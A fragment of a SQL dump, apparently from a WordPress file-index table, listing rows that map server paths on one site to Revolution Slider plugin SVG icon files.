r_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_2_bar_24px.svg'),(2909,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_3_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_3_bar_24px.svg'),(2910,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_4_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_4_bar_24px.svg'),(2911,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_0_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_0_bar_24px.svg'),(2912,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_1_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_1_bar_24px.svg'),(2913,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_2_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_2_bar_24px.svg'),(2914,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_3_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_3_bar_24px.svg'),(2915,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_4_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_connected_no_internet_4_bar_24px.svg'),(2916,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_no_sim_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_no_sim_24px.svg'),(2917,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_null_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_null_24px.svg'),(2918,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_cellular_off_24px.svg'),(2919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_0_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_0_bar_24px.svg'),(2920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_24px.svg'),(2921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_1_bar_lock_24px.svg'),(2922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_24px.svg'),(2923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_2_bar_lock_24px.svg'),(2924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_24px.svg'),(2925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_3_bar_lock_24px.svg'),(2926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_24px.svg'),(2927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_4_bar_lock_24px.svg'),(2928,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_off_24px.svg'),(2929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_1_bar_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_1_bar_26x24px.svg'),(2930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_2_bar_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_2_bar_26x24px.svg'),(2931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_3_bar_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_3_bar_26x24px.svg'),(2932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_4_bar_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_4_bar_26x24px.svg'),(2933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_1_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_1_26x24px.svg'),(2934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_26x24px.svg'),(2935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_2_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_2_26x24px.svg'),(2936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_3_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_3_26x24px.svg'),(2937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_4_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_4_26x24px.svg'),(2938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_not_connected_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_not_connected_26x24px.svg'),(2939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_null_26x24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_null_26x24px.svg'),(2940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_storage_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_storage_24px.svg'),(2941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_usb_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_usb_24px.svg'),(2942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wallpaper_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wallpaper_24px.svg'),(2943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_widgets_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_widgets_24px.svg'),(2944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_lock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_lock_24px.svg'),(2945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_tethering_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/device/ic_wifi_tethering_24px.svg'),(2946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_file_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_file_24px.svg'),(2947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_money_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_attach_money_24px.svg'),(2948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_all_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_all_24px.svg'),(2949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_bottom_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_bottom_24px.svg'),(2950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_clear_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_clear_24px.svg'),(2951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_color_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_color_24px.svg'),(2952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_horizontal_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_horizontal_24px.svg'),(2953,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_inner_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_inner_24px.svg'),(2954,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_left_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_left_24px.svg'),(2955,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_outer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_outer_24px.svg'),(2956,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_right_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_right_24px.svg'),(2957,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_style_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_style_24px.svg'),(2958,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_top_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_top_24px.svg'),(2959,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_vertical_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_vertical_24px.svg'),(2960,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_drag_handle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_drag_handle_24px.svg'),(2961,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_center_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_center_24px.svg'),(2962,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_justify_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_justify_24px.svg'),(2963,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_left_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_left_24px.svg'),(2964,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_right_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_right_24px.svg'),(2965,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_bold_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_bold_24px.svg'),(2966,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_clear_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_clear_24px.svg'),(2967,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_fill_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_fill_24px.svg'),(2968,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_reset_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_reset_24px.svg'),(2969,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_text_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_color_text_24px.svg'),(2970,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_decrease_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_decrease_24px.svg'),(2971,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_increase_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_indent_increase_24px.svg'),(2972,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_italic_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_italic_24px.svg'),(2973,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_line_spacing_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_line_spacing_24px.svg'),(2974,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_bulleted_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_bulleted_24px.svg'),(2975,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_numbered_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_numbered_24px.svg'),(2976,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_paint_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_paint_24px.svg'),(2977,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_quote_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_quote_24px.svg'),(2978,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_shapes_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_shapes_24px.svg'),(2979,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_size_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_size_24px.svg'),(2980,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_strikethrough_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_strikethrough_24px.svg'),(2981,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_l_to_r_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_l_to_r_24px.svg'),(2982,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_r_to_l_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_textdirection_r_to_l_24px.svg'),(2983,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_underlined_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_underlined_24px.svg'),(2984,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_functions_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_functions_24px.svg'),(2985,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_highlight_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_highlight_24px.svg'),(2986,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_chart_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_chart_24px.svg'),(2987,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_comment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_comment_24px.svg'),(2988,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_drive_file_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_drive_file_24px.svg'),(2989,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_emoticon_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_emoticon_24px.svg'),(2990,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_invitation_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_invitation_24px.svg'),(2991,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_link_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_link_24px.svg'),(2992,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_photo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_insert_photo_24px.svg'),(2993,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_linear_scale_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_linear_scale_24px.svg'),(2994,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_merge_type_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_merge_type_24px.svg'),(2995,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_comment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_comment_24px.svg'),(2996,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_edit_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_edit_24px.svg'),(2997,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_money_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_money_off_24px.svg'),(2998,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_publish_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_publish_24px.svg'),(2999,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_short_text_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_short_text_24px.svg'),(3000,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_space_bar_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_space_bar_24px.svg'),(3001,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_strikethrough_s_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_strikethrough_s_24px.svg'),(3002,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_text_fields_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_text_fields_24px.svg'),(3003,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_bottom_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_bottom_24px.svg'),(3004,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_center_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_center_24px.svg'),(3005,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_top_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_vertical_align_top_24px.svg'),(3006,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_wrap_text_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_wrap_text_24px.svg'),(3007,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_attachment_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_attachment_24px.svg'),(3008,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_24px.svg'),(3009,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_circle_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_circle_24px.svg'),(3010,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_done_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_done_24px.svg'),(3011,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_download_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_download_24px.svg'),(3012,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_off_24px.svg'),(3013,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_queue_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_queue_24px.svg'),(3014,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_upload_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_upload_24px.svg'),(3015,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_create_new_folder_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_create_new_folder_24px.svg'),(3016,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_download_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_download_24px.svg'),(3017,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_upload_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_file_upload_24px.svg'),(3018,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_24px.svg'),(3019,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_open_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_open_24px.svg'),(3020,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_shared_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/file/ic_folder_shared_24px.svg'),(3021,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_24px.svg'),(3022,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_connected_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_cast_connected_24px.svg'),(3023,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_computer_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_computer_24px.svg'),(3024,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_mac_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_mac_24px.svg'),(3025,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_windows_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_desktop_windows_24px.svg'),(3026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_developer_board_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_developer_board_24px.svg'),(3027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_device_hub_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_device_hub_24px.svg'),(3028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_devices_other_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_devices_other_24px.svg'),(3029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_dock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_dock_24px.svg'),(3030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_gamepad_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_gamepad_24px.svg'),(3031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_24px.svg'),(3032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_mic_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_headset_mic_24px.svg'),(3033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_24px.svg'),(3034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_down_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_down_24px.svg'),(3035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_left_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_left_24px.svg'),(3036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_right_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_right_24px.svg'),(3037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_up_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_up_24px.svg'),(3038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_backspace_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_backspace_24px.svg'),(3039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_capslock_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_capslock_24px.svg'),(3040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_hide_24px